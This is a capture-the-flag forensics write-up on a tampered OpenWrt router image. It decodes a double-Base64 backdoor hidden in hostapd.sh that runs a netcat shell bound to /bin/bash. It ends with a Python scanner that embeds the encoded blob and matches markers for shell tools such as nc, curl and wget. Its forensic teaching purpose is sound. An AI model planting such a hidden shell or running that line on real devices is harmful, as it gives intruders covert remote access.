
In this post, I'll describe how I solved one of the digital forensics challenges.

I know your secrets:

Description: Our beloved hacker, who hacked the SCADA system in the earlier challenge, got arrested, and while examining their router our investigators found out it was compromised as well. Could you get the IP and port of the attacker who hacked the router? Flag Format: ASCWG{IP:Port}
We are given a squashfs file; this is an OpenWrt firmware image. As we know from the description, it's router firmware. We can use binwalk to extract it; I will use sasquatch.
Basic info about the image:
NAME="OpenWrt"
VERSION="23.05.4"
ID="openwrt"
ID_LIKE="lede openwrt"
PRETTY_NAME="OpenWrt 23.05.4"
VERSION_ID="23.05.4"
HOME_URL="https://openwrt.org/"
BUG_URL="https://bugs.openwrt.org/"
SUPPORT_URL="https://forum.openwrt.org/"
BUILD_ID="r24012-d8dd03c46f"
OPENWRT_BOARD="ipq806x/generic"
OPENWRT_ARCH="arm_cortex-a15_neon-vfpv4"
OPENWRT_TAINTS=""
OPENWRT_DEVICE_MANUFACTURER="OpenWrt"
OPENWRT_DEVICE_MANUFACTURER_URL="https://openwrt.org/"
OPENWRT_DEVICE_PRODUCT="Generic"
OPENWRT_DEVICE_REVISION="v0"
OPENWRT_RELEASE="OpenWrt 23.05.4 r24012-d8dd03c46f"

After extracting all files, we can now begin investigation.

What specific elements should we be searching for? Let's begin with a thorough search of the boot process.
After a standard examination for any potential malicious code or persistence, and after checking the firewall rules, we found nothing suspicious.
Let's approach this from the attacker's perspective. Standard persistence methods are easily detected by investigators, so the attacker could instead embed malicious code within existing system files to evade detection. Additionally, a script that establishes a connection whenever a device connects to the router would provide covert access.
hostapd.sh:
- hostapd is a user-space daemon used to create wireless access points (APs) in Linux environments; it manages the authentication, association, and encryption of wireless clients. hostapd.sh is the OpenWrt shell script that configures and drives it, so it runs whenever a wireless interface is brought up.
This OpenWrt forum topic also discusses the matter: "Run a script for hostapd events".
create_new_session() {
WTJ4aGMzTWdRbUZqYTJSdmIzSWdld29nSUdKaFkydGtiMjl5WDJsd1BTSTBNUzR4TWprdU1UZzJMall6SWdvZ0lHSmhZMnRrYjI5eVgzQnZjblE5SWpVd01UVTRJZ29LSUNCdFpYUm9iMlFnYjNCbGJsOWlZV05yWkc5dmNpZ3BJSHNLSUNBZ0lIZG9hV3hsSUhSeWRXVTdJR1J2Q2lBZ0lDQWdJRzVqSUMxc2RpQWtZbUZqYTJSdmIzSmZhWEFnSkdKaFkydGtiMjl5WDNCdmNuUWdMV1VnTDJKcGJpOWlZWE5vQ2lBZ0lDQmtiMjVsQ2lBZ2ZRcDk=
}
After decoding it from Base64 (the blob is Base64-encoded twice, so it has to be decoded two times), we get:
class Backdoor {
backdoor_ip="41.129.186.63"
backdoor_port="50158"
method open_backdoor() {
while true; do
nc -lv $backdoor_ip $backdoor_port -e /bin/bash
done
}
}
FLAG: ASCWG{41.129.186.63:50158}
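As an added example (not part of the original write-up), the following Python triage script automates the two steps above: it walks an extracted rootfs looking for long Base64 runs inside scripts, peels off however many encoding layers are stacked (the page's blob needs two), and pulls the hard-coded IP and port out of the decoded text. It embeds the blob from hostapd.sh exactly as shown on the page; the stand-in rootfs it builds in a temporary directory (lib/netifd/hostapd.sh, a benign os-release, a benign key-like blob), the 40-character run threshold and the list of marker strings are my assumptions, not the page's. It goes beyond the write-up in that it rejects binary blobs such as keys and certificates, so they are not reported as false positives.

```python
import base64
import binascii
import os
import re
import shutil
import tempfile

# The blob found inside create_new_session() in hostapd.sh, copied from the write-up.
PAGE_BLOB = "WTJ4aGMzTWdRbUZqYTJSdmIzSWdld29nSUdKaFkydGtiMjl5WDJsd1BTSTBNUzR4TWprdU1UZzJMall6SWdvZ0lHSmhZMnRrYjI5eVgzQnZjblE5SWpVd01UVTRJZ29LSUNCdFpYUm9iMlFnYjNCbGJsOWlZV05yWkc5dmNpZ3BJSHNLSUNBZ0lIZG9hV3hsSUhSeWRXVTdJR1J2Q2lBZ0lDQWdJRzVqSUMxc2RpQWtZbUZqYTJSdmIzSmZhWEFnSkdKaFkydGtiMjl5WDNCdmNuUWdMV1VnTDJKcGJpOWlZWE5vQ2lBZ0lDQmtiMjVsQ2lBZ2ZRcDk="

# Runs of Base64 alphabet long enough to be worth decoding (threshold is an assumption).
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
# Assignments such as backdoor_ip="41.129.186.63" / backdoor_port="50158".
IP_ASSIGN = re.compile(r'(?:ip|host|addr)\w*\s*=\s*["\']?(\d{1,3}(?:\.\d{1,3}){3})', re.I)
PORT_ASSIGN = re.compile(r'port\w*\s*=\s*["\']?(\d{1,5})', re.I)
# Strings a decoded payload is likely to contain if it spawns a shell or reaches out (assumed list).
MARKERS = ("nc ", "ncat", "/bin/sh", "/bin/bash", "-e /bin", "telnet", "curl ", "wget ")


def peel_base64(blob, max_layers=5):
    """Strip nested Base64 layers; return (innermost_text, layers_removed).

    A layer is only accepted if it decodes to printable ASCII text, so binary
    blobs (keys, certificates) stop at 0 layers instead of producing garbage."""
    current, layers = blob, 0
    for _ in range(max_layers):
        try:
            text = base64.b64decode(current, validate=True).decode("ascii")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            break
        if not all(ch.isprintable() or ch in "\r\n\t" for ch in text):
            break
        current, layers = text, layers + 1
    return current, layers


def extract_endpoints(text):
    """Pair up IP and port assignments found in decoded script text."""
    return list(zip(IP_ASSIGN.findall(text), PORT_ASSIGN.findall(text)))


def scan_rootfs(root, max_size=1 << 20):
    """Walk an extracted firmware rootfs and report files carrying encoded shell payloads."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            if not os.path.isfile(path) or os.path.getsize(path) > max_size:
                continue
            with open(path, "rb") as fh:
                data = fh.read().decode("latin-1")  # never fails; scripts are ASCII anyway
            for match in B64_RUN.finditer(data):
                text, layers = peel_base64(match.group(0))
                if layers == 0:
                    continue  # binary data, or not Base64 at all
                markers = [m for m in MARKERS if m in text]
                if markers:
                    findings.append({
                        "path": os.path.relpath(path, root),
                        "layers": layers,
                        "markers": markers,
                        "endpoints": extract_endpoints(text),
                    })
    return findings


def build_constructed_rootfs():
    """Create a tiny stand-in for the extracted OpenWrt rootfs (constructed, not from the page)."""
    root = tempfile.mkdtemp(prefix="rootfs_")
    os.makedirs(os.path.join(root, "lib", "netifd"))
    os.makedirs(os.path.join(root, "etc"))
    # The tampered script: the injected function exactly as the write-up shows it.
    with open(os.path.join(root, "lib", "netifd", "hostapd.sh"), "w") as fh:
        fh.write("#!/bin/sh\n\ncreate_new_session() {\n" + PAGE_BLOB + "\n}\n")
    # A benign config file with no Base64 in it at all.
    with open(os.path.join(root, "etc", "os-release"), "w") as fh:
        fh.write('NAME="OpenWrt"\nVERSION="23.05.4"\n')
    # A benign long Base64 run of binary data (constructed key-like blob) that must not be reported.
    with open(os.path.join(root, "etc", "dummy.key"), "w") as fh:
        fh.write(base64.b64encode(bytes(range(256)) * 2).decode() + "\n")
    return root


def demo_scan():
    """Build the constructed rootfs, scan it, clean up, and return the findings."""
    root = build_constructed_rootfs()
    try:
        return scan_rootfs(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for finding in demo_scan():
        print(f"{finding['path']}: {finding['layers']} Base64 layers, "
              f"markers={finding['markers']}, endpoints={finding['endpoints']}")
```

Point scan_rootfs() at the directory sasquatch produced to run it over a real extraction; only files whose decoded payload contains a marker are reported, so the output is short enough to review by hand, and the layer count tells you how many decode passes the attacker stacked.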